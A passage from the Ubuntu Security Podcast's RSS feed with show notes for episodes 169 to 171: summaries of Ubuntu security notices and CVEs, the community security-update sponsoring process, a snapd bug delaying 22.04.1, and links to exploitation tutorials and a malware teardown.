<li>Various memory corruption bugs (OOB reads, NULL ptr derefs, buffer
overflows) which could be triggered via crafted SNMP requests -&gt; crash
(DoS), RCE</li>
</ul>
<h3 id="usn-5463-2-ntfs-3g-vulnerabilities-07-45">[<a href="https://ubuntu.com/security/notices/USN-5463-2">USN-5463-2</a>] NTFS-3G vulnerabilities [07:45]</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-30787">CVE-2022-30787</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30785">CVE-2022-30785</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30789">CVE-2022-30789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30788">CVE-2022-30788</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30786">CVE-2022-30786</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30784">CVE-2022-30784</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30783">CVE-2022-30783</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-163/#usn-5463-1-ntfs-3g-vulnerabilities-06-41">[USN-5463-1] NTFS-3G vulnerabilities - Episode 163</a></li>
<li>DoS / RCE via mounting crafted disk image, mishandling of file handles -
arbitrary memory R/W, intercept traffic between FUSE and kernel -&gt; info
leak etc</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="an-overview-of-the-community-security-updates-sponsoring-process-08-20">An overview of the community security updates sponsoring process [08:20]</h3>
<ul>
<li>Ubuntu Security team supports packages in main+restricted as per <a href="https://wiki.ubuntu.com/SecurityTeam/FAQ#Standard_Support">standard support</a></li>
<li>Universe (and multiverse) components are supported by the community</li>
<li>The ideal process here is a community member files a bug on LP,
subscribes the <a href="https://launchpad.net/~ubuntu-security-sponsors">Ubuntu Security Sponsors team</a> and attaches a debdiff</li>
<li>What is a debdiff?
<ul>
<li>A debdiff is a diff of the source package between the current version
in the Ubuntu archive and the new updated version being proposed</li>
</ul>
</li>
<li>What should the debdiff contain?
<ul>
<li>The bare minimum of changes required to patch the vulnerability
<ul>
<li>ie. a patch file derived from the original upstream project&rsquo;s patch
which fixed the vulnerability, as well as a new changelog entry
describing this update</li>
<li>In general even though an upstream project may release a new version
of their software when patching security vulnerabilies, in Ubuntu we
will not just upgrade to this new version (in the lifetime of a
stable release) to fix the vulnerability - instead we will just
cherry-pick the minimal change required to fix the issue and apply
this ontop of the older version of the software which is maintained
for the life a given Ubuntu release</li>
<li>This reduces the chance of introducing a regression due to new
upstream features getting introduced etc
<ul>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/FAQ#Versions">https://wiki.ubuntu.com/SecurityTeam/FAQ#Versions</a></li>
<li><a href="https://wiki.ubuntu.com/StableReleaseUpdates#Why">https://wiki.ubuntu.com/StableReleaseUpdates#Why</a></li>
</ul>
</li>
</ul>
</li>
<li>Regarding patches - most packages use <a href="https://wiki.debian.org/UsingQuilt">Quilt</a> to manage the set of
patches that get applied ontop of the upstream source tarball within a
debian package</li>
<li>Therefore the debdiff should likely be a new patch file within the
<code>debian/patches</code> directory as well as a corresponding entry for it in the
<code>debian/patches/series</code> file, and then a new <code>debian/changelog</code> entry</li>
<li>Sometimes to backport a fix other supporting commits from the upstream
project may be needed - these can then be included as additional patch
files too</li>
</ul>
</li>
<li>What happens next?
<ul>
<li>Ubuntu Security team member reviews the debiff to make sure it conforms
to the above - in particular to check that the original upstream patch
was used and no other changes were introduced (again to make sure we
keep the risk of regression low and so we have provenance of the code
which has been introduced)</li>
<li>Will usually do a local build of the package and then upload it to the
<a href="https://launchpad.net/~ubuntu-security-proposed/+archive/ubuntu/ppa/">Ubuntu Security Proposed PPA</a> - this is a publicly accessible PPA which
allows the resulting candidate packages to be tested by the Security
Team member as well as the community member</li>
<li>Once testing looks good, the package can be published to the Ubuntu
archive along with an associated USN</li>
</ul>
</li>
<li>A recent examples of this is in
<a href="https://bugs.launchpad.net/ubuntu/+source/spip/+bug/1971185">https://bugs.launchpad.net/ubuntu/+source/spip/+bug/1971185</a> which
corresponded to <a href="/episode-165/#usn-5482-1-spip-vulnerabilities-07-55">USN-5482-1 - SPIP for bionic</a></li>
<li>The team maintains a lot of documentation on how we set up our local
<a href="https://wiki.ubuntu.com/SecurityTeam/BuildEnvironment">build</a> and <a href="https://wiki.ubuntu.com/SecurityTeam/TestingEnvironment">testing</a> environments to make the process a lot easier - in
particular the <code>umt</code> tool which can be used for managing most of these
steps (ie. downloading source packages, adding a new changelog entry,
building the package locally in a schroot, testing the package locally in
a VM etc)</li>
</ul>
<h3 id="ubuntu-22-dot-04-dot-1-release-delayed-17-00">Ubuntu 22.04.1 release delayed [17:00]</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/jammy-jellyfish-22-04-1-lts-point-release-status-tracking/29102">https://discourse.ubuntu.com/t/jammy-jellyfish-22-04-1-lts-point-release-status-tracking/29102</a></li>
<li>Delayed until 11th August - can see test status on the <a href="http://iso.qa.ubuntu.com/qatracker/milestones/437/builds">ISO tracker</a> -
essentially was a bug in snapd when being installed in OEM mode
<ul>
<li>Used by OEMs to install Ubuntu on machines so that when first powered
on by the end user they are offered to setup the machine (create a
local user account, set timezone/language etc)</li>
</ul>
</li>
<li>Bug is that firefox wouldn&rsquo;t run</li>
<li>As earlier, Firefox is now a snap in 22.04 LTS - and the bug is that all
snaps which are seeded (ie. shipped on the ISO and installed OOTB) would
not run
<ul>
<li>only 2 applications fit this - firefox and snap-store - but both are
crucial applications (ie web browser and app store)</li>
</ul>
</li>
<li>snaps are squashfs images that get mounted on boot as systemd mount units</li>
<li>like many systemd units, they specify as <code>WantedBy=multi-user.target</code> - ie
the multi-user target wants them which ensures they are mounted during
normal boot (equivalent to runlevel 2 - ie. not a rescue shell or
shutdown etc) - so basically any normal boot of the system and they
should be mounted</li>
<li>During OEM mode though, on that first boot by the user, the OEM installer
has set the boot target to it&rsquo;s own <code>oem-config.target</code> so it can run first
(to create a new user etc) - and then once it is done it sets the target
to the usual <code>graphical.target</code> which includes <code>multi-user.target</code></li>
<li>Everything then should work though as we do eventually hit the right target</li>
<li>Current thinking is that the new <code>snapd-desktop-integration</code> which is used
to try and automatically install theme snaps and the like to match the
system theme - gets started as part of the <code>oem-config</code> and it then
pokes the <code>snapd.socket</code> which causes <code>snapd.service</code> to be started - yet the
snap mount units are not in place, so snapd can&rsquo;t see any of the expected
snaps, as such it fails to correctly generate their state information</li>
<li>when they do go to be run, they have none of their expected interfaces
defined or connected and so cannot access anything and fail - and even a
reboot doesn&rsquo;t help as the old invalid state is still kept even though
the snaps are now mounted correctly</li>
<li>requires a fix in snapd so that the mount units specify not just
<code>multi-user.target</code> but <code>default.target</code> so they get mounted no matter what
target is being booted into</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E171.mp3" length="15962550" type="audio/mpeg" /><itunes:duration>1372</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 170
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-170/</link>
          <pubDate>Fri, 29 Jul 2022 14:36:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>7f865994becd82b4b740912dcdec4611f3c1aa21498d64af237b68281f63af8b6ccef116c10f64b7a2837fecfd3747c5a83e2196f99070f116a6352625598db2</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 170</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we're diving down into the depths of binary exploitation and
  analysis, looking at a number of recent vulnerability and malware
  teardowns, plus we cover security updates for FreeType, PHP, ImageMagick,
  protobuf-c and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we're diving down into the depths of binary exploitation and
  analysis, looking at a number of recent vulnerability and malware
  teardowns, plus we cover security updates for FreeType, PHP, ImageMagick,
  protobuf-c and more.
  </itunes:summary>
        <description>  This week we're diving down into the depths of binary exploitation and
  analysis, looking at a number of recent vulnerability and malware
  teardowns, plus we cover security updates for FreeType, PHP, ImageMagick,
  protobuf-c and more.
  </description>
        <googleplay:description>  This week we're diving down into the depths of binary exploitation and
  analysis, looking at a number of recent vulnerability and malware
  teardowns, plus we cover security updates for FreeType, PHP, ImageMagick,
  protobuf-c and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we&rsquo;re diving down into the depths of binary exploitation and
analysis, looking at a number of recent vulnerability and malware
teardowns, plus we cover security updates for FreeType, PHP, ImageMagick,
protobuf-c and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>22 unique CVEs addressed</p>
<h3 id="usn-5528-1-freetype-vulnerabilities-01-03">[<a href="https://ubuntu.com/security/notices/USN-5528-1">USN-5528-1</a>] FreeType vulnerabilities [01:03]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31782">CVE-2022-31782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27406">CVE-2022-27406</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27405">CVE-2022-27405</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27404">CVE-2022-27404</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various heap buffer overflows - all which could be triggered from a
crafted font file</li>
</ul>
<h3 id="usn-5529-1-linux-kernel--oem--vulnerabilities-01-22">[<a href="https://ubuntu.com/security/notices/USN-5529-1">USN-5529-1</a>] Linux kernel (OEM) vulnerabilities [01:22]</h3>
<ul>
<li>11 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1652">CVE-2022-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34495">CVE-2022-34495</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34494">CVE-2022-34494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21166">CVE-2022-21166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21125">CVE-2022-21125</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21123">CVE-2022-21123</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2078">CVE-2022-2078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1973">CVE-2022-1973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1852">CVE-2022-1852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1789">CVE-2022-1789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1679">CVE-2022-1679</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.17 22.04 LTS OEM</li>
</ul>
<h3 id="usn-5530-1-php-vulnerability-01-41">[<a href="https://ubuntu.com/security/notices/USN-5530-1">USN-5530-1</a>] PHP vulnerability [01:41]</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31627">CVE-2022-31627</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>php-8.1 in 22.04 LTS - heap buffer overflow in <code>finfo_buffer</code> function -
used to get info etc from a binary string - in the example in the
upstream documentation shows using this function to get the MIME info of
a <code>$_POST</code> parameter - so likely this is being used in a bunch of places on
untrusted data - DoS/RCE</li>
</ul>
<h3 id="usn-5532-1-bottle-vulnerability-02-34">[<a href="https://ubuntu.com/security/notices/USN-5532-1">USN-5532-1</a>] Bottle vulnerability [02:34]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31799">CVE-2022-31799</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python framework for building web-applications</li>
<li>Failed to handle errors properly - could allow a remote request to
trigger an exception -&gt; DoS</li>
</ul>
<h3 id="usn-5533-1-vim-vulnerability-02-50">[<a href="https://ubuntu.com/security/notices/USN-5533-1">USN-5533-1</a>] Vim vulnerability [02:50]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2129">CVE-2022-2129</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Another OOB write in vim -&gt; crash / RCE</li>
</ul>
<h3 id="usn-5534-1-imagemagick-vulnerabilities-02-58">[<a href="https://ubuntu.com/security/notices/USN-5534-1">USN-5534-1</a>] ImageMagick vulnerabilities [02:58]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-32547">CVE-2022-32547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32546">CVE-2022-32546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32545">CVE-2022-32545</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Someone has been running ImageMagick via UBSAN - found a number of cases
of possible UB - impact is not clear but could be possible to crash/RCE
etc</li>
</ul>
<h3 id="usn-5531-1-protobuf-c-vulnerability-02-32">[<a href="https://ubuntu.com/security/notices/USN-5531-1">USN-5531-1</a>] protobuf-c vulnerability [02:32]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33070">CVE-2022-33070</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Used to compile protobuf specification to C code along with a library
which is then linked against that generated code to marshal/unmarshal
protobuf&rsquo;s</li>
<li>Invalid arithmetic shift - previous code would right shift signed values
which is implementation defined - so depending on what compiler was used
could have different behaviour - and thus result in code that would write
outside of memory bounds etc - fixed by converting the code to cast to
unsigned type before shifting so that the behaviour is known</li>
</ul>
<h2 id="goings-on-in-linux-security-community">Goings on in Linux Security Community</h2>
<h3 id="introduction-to-x64-linux-binary-exploitation-by-ch0pin-04-24">Introduction to x64 Linux Binary Exploitation by <a href="https://twitter.com/ch0pin">@ch0pin</a> [04:24]</h3>
<ul>
<li>Great series of blog posts from earlier this year</li>
<li>Starts by creating a small program with a basic stack buffer overflow
vulnerability</li>
<li>Then disables all the various hardening features which have been added to
Ubuntu to then allow it to be easily exploited</li>
<li>Along the way explains memory layout, processor architecture etc to help
understand the process of developing exploits</li>
<li>Further blog posts in the series then start to enable the various
hardening features one-by-one and in the process walk through more
detailed and complex techniques for defeating these</li>
<li>Great insight to the process - also includes good references along the
way to other sources of documentation / information on related concepts</li>
</ul>
<h4 id="part-1-basic-buffer-overflow">Part 1 - Basic Buffer Overflow</h4>
<ul>
<li><a href="https://valsamaras.medium.com/introduction-to-x64-linux-binary-exploitation-part-1-14ad4a27aeef">https://valsamaras.medium.com/introduction-to-x64-linux-binary-exploitation-part-1-14ad4a27aeef</a></li>
</ul>
<h4 id="part-2-return-into-libc">Part 2 - Return into libc</h4>
<ul>
<li><a href="https://valsamaras.medium.com/introduction-to-x64-binary-exploitation-part-2-return-into-libc-c325017f465">https://valsamaras.medium.com/introduction-to-x64-binary-exploitation-part-2-return-into-libc-c325017f465</a></li>
</ul>
<h4 id="part-3-rop-gadgets-and-chain">Part 3 - RoP gadgets and chain</h4>
<ul>
<li><a href="https://valsamaras.medium.com/introduction-to-x64-linux-binary-exploitation-part-3-rop-chains-3cdcf17e8826">https://valsamaras.medium.com/introduction-to-x64-linux-binary-exploitation-part-3-rop-chains-3cdcf17e8826</a></li>
</ul>
<h4 id="part-4-stack-canaries">Part 4 - Stack Canaries</h4>
<ul>
<li><a href="https://valsamaras.medium.com/introduction-to-x64-linux-binary-exploitation-part-4-stack-canaries-e9b6dd2c3127">https://valsamaras.medium.com/introduction-to-x64-linux-binary-exploitation-part-4-stack-canaries-e9b6dd2c3127</a></li>
</ul>
<h4 id="part-5-aslr-overview-and-bypass-technique">Part 5 - ASLR overview and bypass technique</h4>
<ul>
<li><a href="https://valsamaras.medium.com/introduction-to-x64-linux-binary-exploitation-part-5-aslr-394d0dc8e4fb">https://valsamaras.medium.com/introduction-to-x64-linux-binary-exploitation-part-5-aslr-394d0dc8e4fb</a></li>
</ul>
<h3 id="cve-2022-20186-vulnerability-plus-exploit-walkthrough-by-github-07-04">CVE-2022-20186 vulnerability + exploit walkthrough by Github [07:04]</h3>
<ul>
<li><a href="https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/">https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/</a></li>
<li>Vulnerability in the ARM Mali GPU driver in the Android kernel</li>
<li>Walks through the code to give a good understanding of how memory pages
are handled by the driver and then eventually how this can be exploited
from userspace to overwrite arbitrary kernel memory due to an integer
overflow bug</li>
<li>Even includes an exploit for Pixel 6 (patched with the June Pixel update
from Google)</li>
<li>Interesting footnote about how the patch for the vuln was visible in the
Android tree 2 weeks before the vulnerability was disclosed</li>
</ul>
<h3 id="a-detailed-technical-teardown-of-symbiote-by-geekscyber-08-49">A detailed technical teardown of Symbiote by <a href="https://twitter.com/GeeksCyber">@GeeksCyber</a> [08:49]</h3>
<ul>
<li><a href="https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/">https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/</a></li>
<li>We covered a different teardown of Symbiote back in <a href="https://ubuntusecuritypodcast.org/episode-163/">Episode 163</a> - this
one has a fair bit more technical details along with disassembled code
sections - good chance to put your skills in Linux binary exploitation to
the test to follow along with the analysis</li>
</ul>
<h3 id="the-utopic-tale-of-ubuntu-by-the-linux-user-space-podcast-09-31">The Utopic Tale of Ubuntu by the Linux User Space podcast [09:31]</h3>
<ul>
<li><a href="https://www.linuxuserspace.show/302">https://www.linuxuserspace.show/302</a></li>
<li>Starts around 9:45 - covers every year of Ubuntu from 2004 through to now
along with the major developments / highlights and some low-lights along
the way</li>
<li>Great walk down memory lane / background for those new to Ubuntu</li>
<li>Not really security specific but is a great listen (beware goes for over
1.5 hours)</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E170.mp3" length="9252288" type="audio/mpeg" /><itunes:duration>669</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 169
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-169/</link>
          <pubDate>Fri, 22 Jul 2022 23:17:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>f58fc77c49da3d3935fd315f29253d6442194dae9310097489cea1a1eb55d9a36d9fa0271d0184f3eed23d122c4409a7edebc704a385ec816a8811899a13e3fe</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 169</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          It's the 22.10 mid-cycle roadmap sprint at Canonical this week plus we look
  at security updates for Git, the Linux kernel, Vim, Python, PyJWT and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  It's the 22.10 mid-cycle roadmap sprint at Canonical this week plus we look
  at security updates for Git, the Linux kernel, Vim, Python, PyJWT and more.
  </itunes:summary>
        <description>  It's the 22.10 mid-cycle roadmap sprint at Canonical this week plus we look
  at security updates for Git, the Linux kernel, Vim, Python, PyJWT and more.
  </description>
        <googleplay:description>  It's the 22.10 mid-cycle roadmap sprint at Canonical this week plus we look
  at security updates for Git, the Linux kernel, Vim, Python, PyJWT and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s the 22.10 mid-cycle roadmap sprint at Canonical this week plus we look
at security updates for Git, the Linux kernel, Vim, Python, PyJWT and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>58 unique CVEs addressed</p>
<h3 id="usn-5511-1-git-vulnerabilities-00-45">[<a href="https://ubuntu.com/security/notices/USN-5511-1">USN-5511-1</a>] Git vulnerabilities [00:45]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29187">CVE-2022-29187</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24765">CVE-2022-24765</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Related to CVE-2022-24765 which we covered back in <a href="https://ubuntusecuritypodcast.org/episode-157/">Episode 157</a> - this was
a vuln in Git for Windows which could allow a local user who could write
to <code>C:\</code> to create a gitconfig that would contain commands that may then
get executed by other users when running <code>git</code> themselves</li>
<li>Is an issue for Ubuntu since with WSL you can now run git as shipped in
Ubuntu on Windows which then would be vulnerable (or at least it was
until we fixed it 😁)</li>
</ul>
<h3 id="usn-5473-2-ca-certificates-update-01-41">[<a href="https://ubuntu.com/security/notices/USN-5473-2">USN-5473-2</a>] ca-certificates update [01:41]</h3>
<ul>
<li>Affecting Xenial ESM (16.04 ESM)</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-164/">Episode 164</a></li>
</ul>
<h3 id="usn-5513-1-linux-kernel--aws--vulnerabilities-01-53">[<a href="https://ubuntu.com/security/notices/USN-5513-1">USN-5513-1</a>] Linux kernel (AWS) vulnerabilities [01:53]</h3>
<ul>
<li>19 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28388">CVE-2022-28388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28356">CVE-2022-28356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24958">CVE-2022-24958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21166">CVE-2022-21166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21125">CVE-2022-21125</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21123">CVE-2022-21123</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1734">CVE-2022-1734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1679">CVE-2022-1679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1652">CVE-2022-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1419">CVE-2022-1419</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1353">CVE-2022-1353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0330">CVE-2022-0330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4202">CVE-2021-4202</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4197">CVE-2021-4197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39714">CVE-2021-39714</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39685">CVE-2021-39685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3760">CVE-2021-3760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3752">CVE-2021-3752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 kernel for 14.04 ESM machines on AWS</li>
<li>Most interesting vulnerablity is a race condition in the CAN BCM
networking protocol which then results in multiple possible UAFs - the
use of unprivileged user namespaces allows a local unprivileged user to
exploit this and then gain root priviliges in the root namespace - PoC on
github along with a very detailed write-up, hence the high priority
rating given to this vulnerability</li>
<li>Various other similar vulns (race conditions and the like which can then
allow a local user to possibly escalate privileges to root) - but the
others don&rsquo;t have public exploits, hence the medium priority rating</li>
</ul>
<h3 id="usn-5514-1-linux-kernel-vulnerabilities-03-11">[<a href="https://ubuntu.com/security/notices/USN-5514-1">USN-5514-1</a>] Linux kernel vulnerabilities [03:11]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33981">CVE-2022-33981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1789">CVE-2022-1789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1205">CVE-2022-1205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1204">CVE-2022-1204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1199">CVE-2022-1199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1195">CVE-2022-1195</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 GA / HWE for 18.04 LTS as well as various kernels optimised for the
different public clouds</li>
<li>Bunch of vulns in AX.25 amateur radio protocol implementation - local
attacker could possibly crash kernel or privesc - would likely need a
custom H/W device to do this though</li>
<li>Race condition in the floppy driver -&gt; UAF etc</li>
</ul>
<h3 id="usn-5515-1-linux-kernel-vulnerabilities-03-41">[<a href="https://ubuntu.com/security/notices/USN-5515-1">USN-5515-1</a>] Linux kernel vulnerabilities [03:41]</h3>
<ul>
<li>10 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28389">CVE-2022-28389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2380">CVE-2022-2380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1516">CVE-2022-1516</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1353">CVE-2022-1353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1205">CVE-2022-1205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1204">CVE-2022-1204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1199">CVE-2022-1199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1198">CVE-2022-1198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1011">CVE-2022-1011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4197">CVE-2021-4197</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 18.04 LTS GA + clouds + devices (raspi, snapdragon etc), 16.04 ESM
HWE + clouds etc</li>
</ul>
<h3 id="usn-5517-1-linux-kernel--oem--vulnerabilities-04-04">[<a href="https://ubuntu.com/security/notices/USN-5517-1">USN-5517-1</a>] Linux kernel (OEM) vulnerabilities [04:04]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34494">CVE-2022-34494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1679">CVE-2022-1679</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.14 OEM</li>
<li>OEM kernel contains various hardware enablement features for the
different OEM platforms which Ubuntu comes pre-installed on, these
eventually find they way back to the GA/HWE kernels</li>
</ul>
